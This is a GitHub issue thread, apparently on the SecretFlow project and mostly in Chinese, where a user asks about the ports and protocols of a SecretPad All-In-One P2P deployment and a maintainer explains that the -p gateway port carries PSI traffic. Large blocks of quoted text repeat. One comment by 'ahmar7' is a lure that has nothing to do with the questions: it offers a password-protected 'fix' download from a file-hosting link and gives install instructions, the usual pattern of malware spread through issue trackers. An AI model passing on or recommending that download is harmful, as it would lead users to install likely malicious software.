### ISSUE TITLE
关于通信端口与通信协议的疑问

### ISSUE THREAD

**Issue by coderSun20201112** [secretflow/secretflow#1449]
### Issue Type

Others

### Source

source

### Secretflow Version

secretflow-1.7.0

### OS Platform and Distribution

Kylin 10

### Python version

3.10

### What happend and What you expected to happen.

```shell
通过SecretPad All In One方式快捷部署系统，按照提供的sh install.sh autonomy进行P2P组网方式，指令如下：sh install.sh autonomy -n alice -s 8080 -g 40803 -k 40802 -p 10080 -q 13081 -P mtls，我有如下疑问：
疑问1：-P参数用来指定KusciaAPI以及节点对外网关使用的通信协议，即-g、-k、-p端口到底是用HTTP还是HTTPS，取决于-P参数，这样理解对不对？
疑问2：当我发起隐私求交时，Kuscia调起POD，此时不同服务器节点的POD是通过哪个端口进行PSI协议的，具体执行的网络协议分别有哪些？
```

### Reproduction code to reproduce the issue.

```shell
install.sh autonomy -n alice -s 8080 -g 40803 -k 40802 -p 10080 -q 13081 -P mtls
```

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by wangzul** [comment]
疑问1：-P参数用来指定KusciaAPI以及节点对外网关使用的通信协议，即-g、-k、-p端口到底是用HTTP还是HTTPS，取决于-P参数，这样理解对不对？

这个理解是对的-P 是控制kuscia部署时使用的协议
Tips：节点通讯地址协议是根据kuscia.yaml「protocol 参数配置（默认为TLS）」NOTLS对应http，TLS和MTLS对应https。

疑问2：当我发起隐私求交时，Kuscia调起POD，此时不同服务器节点的POD是通过哪个端口进行PSI协议的，具体执行的网络协议分别有哪些？
发起隐私求交时POD之间的通讯是使用kuscia网关端口(默认1080)进行通讯。
网络协议可以参考下方文档
https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/deployment/networkrequirements#id1
https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/troubleshoot/protocol_describe#id1

**Comment by coderSun20201112** [comment]
谢谢老师指教，另外还有一个问题：当我在虚拟机部署SecretPad All In One后，一切正常，各项功能正常工作，但当我修改虚拟机的日期时间后，PSI每次操作都是失败的，因为我之前部署过k8s集群，k8s集群要求集群内各个服务器日期时间严格统一，因此，SecretPad All In One平台是不是也对服务器/虚拟机的日期时间有要求，比如：系统部署后，不准修改系统时间？

**Comment by coderSun20201112** [comment]
老师，我还有几个问题想请教一下：
问题1：当secretpad all in one部署完毕，合作节点也已经认证完毕后，alice与bob要改变原先的IP地址，这种情况下，双方的secertpad all in one需要修改哪些地方？
问题2：目前secretpad all in one部署后，我都是通过IP直接访问，能支持通过域名来访问吗？
问题3：当alice与bob这2家机构联网时，基于这种情况，本系统需要开放哪些端口，要支持哪些协议，防火墙放行规则与配置脚本，这些资料，目前有吗？

**Comment by wangzul** [comment]
问题1：当secretpad all in one部署完毕，合作节点也已经认证完毕后，alice与bob要改变原先的IP地址，这种情况下，双方的secertpad all in one需要修改哪些地方？
中心化部署是单机模式，会使用docker network网络(dns 解析容器名称)进行访问的。
P2P节点需要手动部署节点并配置合作方
如果IP修改需要通过修改合作节点的配置  删除原有的再重新建立。

问题2：目前secretpad all in one部署后，我都是通过IP直接访问，能支持通过域名来访问吗？
支持域名访问
至于使用http还是https 有2个参考
1. 使用代理则根据代理的配置来决定
2. 无代理模式根据kuscia  Protocol决定，也就是allinone -P参数
3. https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/troubleshoot/protocol_describe#id1

问题3：当alice与bob这2家机构联网时，基于这种情况，本系统需要开放哪些端口，要支持哪些协议，防火墙放行规则与配置脚本，这些资料，目前有吗？
默认开放 1080 即可
注意docker的网络模式
端口 https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/deployment/kuscia_ports_cn#kuscia
网络 https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/deployment/networkrequirements#id3

**Comment by coderSun20201112** [comment]
> 问题1：当secretpad all in one部署完毕，合作节点也已经认证完毕后，alice与bob要改变原先的IP地址，这种情况下，双方的secertpad all in one需要修改哪些地方？ 中心化部署是单机模式，会使用docker network网络(dns 解析容器名称)进行访问的。 P2P节点需要手动部署节点并配置合作方 如果IP修改需要通过修改合作节点的配置 删除原有的再重新建立。
> 
> 问题2：目前secretpad all in one部署后，我都是通过IP直接访问，能支持通过域名来访问吗？ 支持域名访问 至于使用http还是https 有2个参考
> 
> 1. 使用代理则根据代理的配置来决定
> 2. 无代理模式根据kuscia  Protocol决定，也就是allinone -P参数
> 3. https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/troubleshoot/protocol_describe#id1
> 
> 问题3：当alice与bob这2家机构联网时，基于这种情况，本系统需要开放哪些端口，要支持哪些协议，防火墙放行规则与配置脚本，这些资料，目前有吗？ 默认开放 1080 即可 注意docker的网络模式 端口 https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/deployment/kuscia_ports_cn#kuscia 网络 https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/deployment/networkrequirements#id3

这里的问题1，当我采用P2P方式组网，当改变IP之后，我只需再重新新增合作节点即可，其他不需要任何改动，我这么理解对吗？

**Comment by wangzul** [comment]
> > 问题1：当secretpad all in one部署完毕，合作节点也已经认证完毕后，alice与bob要改变原先的IP地址，这种情况下，双方的secertpad all in one需要修改哪些地方？ 中心化部署是单机模式，会使用docker network网络(dns 解析容器名称)进行访问的。 P2P节点需要手动部署节点并配置合作方 如果IP修改需要通过修改合作节点的配置 删除原有的再重新建立。
> > 问题2：目前secretpad all in one部署后，我都是通过IP直接访问，能支持通过域名来访问吗？ 支持域名访问 至于使用http还是https 有2个参考
> > 
> > 1. 使用代理则根据代理的配置来决定
> > 2. 无代理模式根据kuscia  Protocol决定，也就是allinone -P参数
> > 3. https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/troubleshoot/protocol_describe#id1
> > 
> > 问题3：当alice与bob这2家机构联网时，基于这种情况，本系统需要开放哪些端口，要支持哪些协议，防火墙放行规则与配置脚本，这些资料，目前有吗？ 默认开放 1080 即可 注意docker的网络模式 端口 https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/deployment/kuscia_ports_cn#kuscia 网络 https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/deployment/networkrequirements#id3
> 
> 这里的问题1，当我采用P2P方式组网，当改变IP之后，我只需再重新新增合作节点即可，其他不需要任何改动，我这么理解对吗？

ip改变后编辑合作节点只能修改本方的配置，所以需要删除异常节点，重新添加合作节点即可。

**Comment by coderSun20201112** [comment]
> 问题1：当secretpad all in one部署完毕，合作节点也已经认证完毕后，alice与bob要改变原先的IP地址，这种情况下，双方的secertpad all in one需要修改哪些地方？ 中心化部署是单机模式，会使用docker network网络(dns 解析容器名称)进行访问的。 P2P节点需要手动部署节点并配置合作方 如果IP修改需要通过修改合作节点的配置 删除原有的再重新建立。
> 
> 问题2：目前secretpad all in one部署后，我都是通过IP直接访问，能支持通过域名来访问吗？ 支持域名访问 至于使用http还是https 有2个参考
> 
> 1. 使用代理则根据代理的配置来决定
> 2. 无代理模式根据kuscia  Protocol决定，也就是allinone -P参数
> 3. https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/troubleshoot/protocol_describe#id1
> 
> 问题3：当alice与bob这2家机构联网时，基于这种情况，本系统需要开放哪些端口，要支持哪些协议，防火墙放行规则与配置脚本，这些资料，目前有吗？ 默认开放 1080 即可 注意docker的网络模式 端口 https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/deployment/kuscia_ports_cn#kuscia 网络 https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/deployment/networkrequirements#id3

这里的问题3：
我看了官方，按照官方说明，只需要公开“-p参数”指定的端口，即install.sh autonomy -p参数，我在添加合作节点时，显式用到该端口，但当我发起PSI操作，比如ecdh、kkrt、rr22协议时，这些协议也是复用“-p参数”指定的端口吗？

> 问题1：当secretpad all in one部署完毕，合作节点也已经认证完毕后，alice与bob要改变原先的IP地址，这种情况下，双方的secertpad all in one需要修改哪些地方？ 中心化部署是单机模式，会使用docker network网络(dns 解析容器名称)进行访问的。 P2P节点需要手动部署节点并配置合作方 如果IP修改需要通过修改合作节点的配置 删除原有的再重新建立。
> 
> 问题2：目前secretpad all in one部署后，我都是通过IP直接访问，能支持通过域名来访问吗？ 支持域名访问 至于使用http还是https 有2个参考
> 
> 1. 使用代理则根据代理的配置来决定
> 2. 无代理模式根据kuscia  Protocol决定，也就是allinone -P参数
> 3. https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/troubleshoot/protocol_describe#id1
> 
> 问题3：当alice与bob这2家机构联网时，基于这种情况，本系统需要开放哪些端口，要支持哪些协议，防火墙放行规则与配置脚本，这些资料，目前有吗？ 默认开放 1080 即可 注意docker的网络模式 端口 https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/deployment/kuscia_ports_cn#kuscia 网络 https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/deployment/networkrequirements#id3

这里的问题3，我还是有点疑问：
我看了官方，按照官方说明，只需要公开“-p参数”指定的端口，即install.sh autonomy -p参数，我在添加合作节点时，确实显式用到该端口，但当我发起PSI操作，比如ecdh、kkrt、rr22协议时，这些协议也是复用“-p参数”指定的端口吗，无需再额外开放其他端口？

**Comment by wangzul** [comment]
> > > 问题1：当secretpad all in one部署完毕，合作节点也已经认证完毕后，alice与bob要改变原先的IP地址，这种情况下，双方的secertpad all in one需要修改哪些地方？ 中心化部署是单机模式，会使用docker network网络(dns 解析容器名称)进行访问的。 P2P节点需要手动部署节点并配置合作方 如果IP修改需要通过修改合作节点的配置 删除原有的再重新建立。
> > > 问题2：目前secretpad all in one部署后，我都是通过IP直接访问，能支持通过域名来访问吗？ 支持域名访问 至于使用http还是https 有2个参考
> > > 
> > > 1. 使用代理则根据代理的配置来决定
> > > 2. 无代理模式根据kuscia  Protocol决定，也就是allinone -P参数
> > > 3. https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/troubleshoot/protocol_describe#id1
> > > 
> > > 问题3：当alice与bob这2家机构联网时，基于这种情况，本系统需要开放哪些端口，要支持哪些协议，防火墙放行规则与配置脚本，这些资料，目前有吗？ 默认开放 1080 即可 注意docker的网络模式 端口 https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/deployment/kuscia_ports_cn#kuscia 网络 https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/deployment/networkrequirements#id3
> > 
> > 
> > 这里的问题1，当我采用P2P方式组网，当改变IP之后，我只需再重新新增合作节点即可，其他不需要任何改动，我这么理解对吗？
> 
> ip改变后编辑合作节点只能修改本方的配置，所以需要删除异常节点，重新添加合作节点即可。



> > 问题1：当secretpad all in one部署完毕，合作节点也已经认证完毕后，alice与bob要改变原先的IP地址，这种情况下，双方的secertpad all in one需要修改哪些地方？ 中心化部署是单机模式，会使用docker network网络(dns 解析容器名称)进行访问的。 P2P节点需要手动部署节点并配置合作方 如果IP修改需要通过修改合作节点的配置 删除原有的再重新建立。
> > 问题2：目前secretpad all in one部署后，我都是通过IP直接访问，能支持通过域名来访问吗？ 支持域名访问 至于使用http还是https 有2个参考
> > 
> > 1. 使用代理则根据代理的配置来决定
> > 2. 无代理模式根据kuscia  Protocol决定，也就是allinone -P参数
> > 3. https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/troubleshoot/protocol_describe#id1
> > 
> > 问题3：当alice与bob这2家机构联网时，基于这种情况，本系统需要开放哪些端口，要支持哪些协议，防火墙放行规则与配置脚本，这些资料，目前有吗？ 默认开放 1080 即可 注意docker的网络模式 端口 https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/deployment/kuscia_ports_cn#kuscia 网络 https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/deployment/networkrequirements#id3
> 
> 这里的问题1，当我采用P2P方式组网，当改变IP之后，我只需再重新新增合作节点即可，其他不需要任何改动，我这么理解对吗？

我重新回复一下。
如果是中心化模式  lite 节点之间需要重新建立合作节点。
如果是点对点模式  节点之间有严格的权限控制，进入合作节点 可以点击编辑模式修改对方的ip配置，本方的ip可以通过上方xxxxx节点配置中修改IP， 这个过程需要2-3分钟左右的时间。

**Comment by wangzul** [comment]
> > > 问题1：当secretpad all in one部署完毕，合作节点也已经认证完毕后，alice与bob要改变原先的IP地址，这种情况下，双方的secertpad all in one需要修改哪些地方？ 中心化部署是单机模式，会使用docker network网络(dns 解析容器名称)进行访问的。 P2P节点需要手动部署节点并配置合作方 如果IP修改需要通过修改合作节点的配置 删除原有的再重新建立。
> > > 问题2：目前secretpad all in one部署后，我都是通过IP直接访问，能支持通过域名来访问吗？ 支持域名访问 至于使用http还是https 有2个参考
> > > 
> > > 1. 使用代理则根据代理的配置来决定
> > > 2. 无代理模式根据kuscia  Protocol决定，也就是allinone -P参数
> > > 3. https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/troubleshoot/protocol_describe#id1
> > > 
> > > 问题3：当alice与bob这2家机构联网时，基于这种情况，本系统需要开放哪些端口，要支持哪些协议，防火墙放行规则与配置脚本，这些资料，目前有吗？ 默认开放 1080 即可 注意docker的网络模式 端口 https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/deployment/kuscia_ports_cn#kuscia 网络 https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/deployment/networkrequirements#id3
> > 
> > 
> > 这里的问题1，当我采用P2P方式组网，当改变IP之后，我只需再重新新增合作节点即可，其他不需要任何改动，我这么理解对吗？
> 
> ip改变后编辑合作节点只能修改本方的配置，所以需要删除异常节点，重新添加合作节点即可。



> > 问题1：当secretpad all in one部署完毕，合作节点也已经认证完毕后，alice与bob要改变原先的IP地址，这种情况下，双方的secertpad all in one需要修改哪些地方？ 中心化部署是单机模式，会使用docker network网络(dns 解析容器名称)进行访问的。 P2P节点需要手动部署节点并配置合作方 如果IP修改需要通过修改合作节点的配置 删除原有的再重新建立。
> > 问题2：目前secretpad all in one部署后，我都是通过IP直接访问，能支持通过域名来访问吗？ 支持域名访问 至于使用http还是https 有2个参考
> > 
> > 1. 使用代理则根据代理的配置来决定
> > 2. 无代理模式根据kuscia  Protocol决定，也就是allinone -P参数
> > 3. https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/troubleshoot/protocol_describe#id1
> > 
> > 问题3：当alice与bob这2家机构联网时，基于这种情况，本系统需要开放哪些端口，要支持哪些协议，防火墙放行规则与配置脚本，这些资料，目前有吗？ 默认开放 1080 即可 注意docker的网络模式 端口 https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/deployment/kuscia_ports_cn#kuscia 网络 https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/deployment/networkrequirements#id3
> 
> 这里的问题1，当我采用P2P方式组网，当改变IP之后，我只需再重新新增合作节点即可，其他不需要任何改动，我这么理解对吗？

我重新回复一下。
如果是中心化模式  lite 节点之间需要重新建立合作节点。
如果是点对点模式  节点之间有严格的权限控制，进入合作节点 可以点击编辑模式修改对方的ip配置，本方的ip可以通过上方xxxxx节点配置中修改IP， 这个过程需要2-3分钟左右的时间。

> > 问题1：当secretpad all in one部署完毕，合作节点也已经认证完毕后，alice与bob要改变原先的IP地址，这种情况下，双方的secertpad all in one需要修改哪些地方？ 中心化部署是单机模式，会使用docker network网络(dns 解析容器名称)进行访问的。 P2P节点需要手动部署节点并配置合作方 如果IP修改需要通过修改合作节点的配置 删除原有的再重新建立。
> > 问题2：目前secretpad all in one部署后，我都是通过IP直接访问，能支持通过域名来访问吗？ 支持域名访问 至于使用http还是https 有2个参考
> > 
> > 1. 使用代理则根据代理的配置来决定
> > 2. 无代理模式根据kuscia  Protocol决定，也就是allinone -P参数
> > 3. https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/troubleshoot/protocol_describe#id1
> > 
> > 问题3：当alice与bob这2家机构联网时，基于这种情况，本系统需要开放哪些端口，要支持哪些协议，防火墙放行规则与配置脚本，这些资料，目前有吗？ 默认开放 1080 即可 注意docker的网络模式 端口 https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/deployment/kuscia_ports_cn#kuscia 网络 https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/deployment/networkrequirements#id3
> 
> 这里的问题3： 我看了官方，按照官方说明，只需要公开“-p参数”指定的端口，即install.sh autonomy -p参数，我在添加合作节点时，显式用到该端口，但当我发起PSI操作，比如ecdh、kkrt、rr22协议时，这些协议也是复用“-p参数”指定的端口吗？
> 
> > 问题1：当secretpad all in one部署完毕，合作节点也已经认证完毕后，alice与bob要改变原先的IP地址，这种情况下，双方的secertpad all in one需要修改哪些地方？ 中心化部署是单机模式，会使用docker network网络(dns 解析容器名称)进行访问的。 P2P节点需要手动部署节点并配置合作方 如果IP修改需要通过修改合作节点的配置 删除原有的再重新建立。
> > 问题2：目前secretpad all in one部署后，我都是通过IP直接访问，能支持通过域名来访问吗？ 支持域名访问 至于使用http还是https 有2个参考
> > 
> > 1. 使用代理则根据代理的配置来决定
> > 2. 无代理模式根据kuscia  Protocol决定，也就是allinone -P参数
> > 3. https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/troubleshoot/protocol_describe#id1
> > 
> > 问题3：当alice与bob这2家机构联网时，基于这种情况，本系统需要开放哪些端口，要支持哪些协议，防火墙放行规则与配置脚本，这些资料，目前有吗？ 默认开放 1080 即可 注意docker的网络模式 端口 https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/deployment/kuscia_ports_cn#kuscia 网络 https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/deployment/networkrequirements#id3
> 
> 这里的问题3，我还是有点疑问： 我看了官方，按照官方说明，只需要公开“-p参数”指定的端口，即install.sh autonomy -p参数，我在添加合作节点时，确实显式用到该端口，但当我发起PSI操作，比如ecdh、kkrt、rr22协议时，这些协议也是复用“-p参数”指定的端口吗，无需再额外开放其他端口？



> > 问题1：当secretpad all in one部署完毕，合作节点也已经认证完毕后，alice与bob要改变原先的IP地址，这种情况下，双方的secertpad all in one需要修改哪些地方？ 中心化部署是单机模式，会使用docker network网络(dns 解析容器名称)进行访问的。 P2P节点需要手动部署节点并配置合作方 如果IP修改需要通过修改合作节点的配置 删除原有的再重新建立。
> > 问题2：目前secretpad all in one部署后，我都是通过IP直接访问，能支持通过域名来访问吗？ 支持域名访问 至于使用http还是https 有2个参考
> > 
> > 1. 使用代理则根据代理的配置来决定
> > 2. 无代理模式根据kuscia  Protocol决定，也就是allinone -P参数
> > 3. https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/troubleshoot/protocol_describe#id1
> > 
> > 问题3：当alice与bob这2家机构联网时，基于这种情况，本系统需要开放哪些端口，要支持哪些协议，防火墙放行规则与配置脚本，这些资料，目前有吗？ 默认开放 1080 即可 注意docker的网络模式 端口 https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/deployment/kuscia_ports_cn#kuscia 网络 https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/deployment/networkrequirements#id3
> 
> 这里的问题3： 我看了官方，按照官方说明，只需要公开“-p参数”指定的端口，即install.sh autonomy -p参数，我在添加合作节点时，显式用到该端口，但当我发起PSI操作，比如ecdh、kkrt、rr22协议时，这些协议也是复用“-p参数”指定的端口吗？
> 
> > 问题1：当secretpad all in one部署完毕，合作节点也已经认证完毕后，alice与bob要改变原先的IP地址，这种情况下，双方的secertpad all in one需要修改哪些地方？ 中心化部署是单机模式，会使用docker network网络(dns 解析容器名称)进行访问的。 P2P节点需要手动部署节点并配置合作方 如果IP修改需要通过修改合作节点的配置 删除原有的再重新建立。
> > 问题2：目前secretpad all in one部署后，我都是通过IP直接访问，能支持通过域名来访问吗？ 支持域名访问 至于使用http还是https 有2个参考
> > 
> > 1. 使用代理则根据代理的配置来决定
> > 2. 无代理模式根据kuscia  Protocol决定，也就是allinone -P参数
> > 3. https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/troubleshoot/protocol_describe#id1
> > 
> > 问题3：当alice与bob这2家机构联网时，基于这种情况，本系统需要开放哪些端口，要支持哪些协议，防火墙放行规则与配置脚本，这些资料，目前有吗？ 默认开放 1080 即可 注意docker的网络模式 端口 https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/deployment/kuscia_ports_cn#kuscia 网络 https://www.secretflow.org.cn/zh-CN/docs/kuscia/v0.11.0b0/deployment/networkrequirements#id3
> 
> 这里的问题3，我还是有点疑问： 我看了官方，按照官方说明，只需要公开“-p参数”指定的端口，即install.sh autonomy -p参数，我在添加合作节点时，确实显式用到该端口，但当我发起PSI操作，比如ecdh、kkrt、rr22协议时，这些协议也是复用“-p参数”指定的端口吗，无需再额外开放其他端口？

-p 端口需要对外开放(双方psi任务也是通过这个端口来进行通讯的)，其它端口一般是在内网或者和pad做交互时使用比如 -k -g -s 这些端口都是内部使用的。
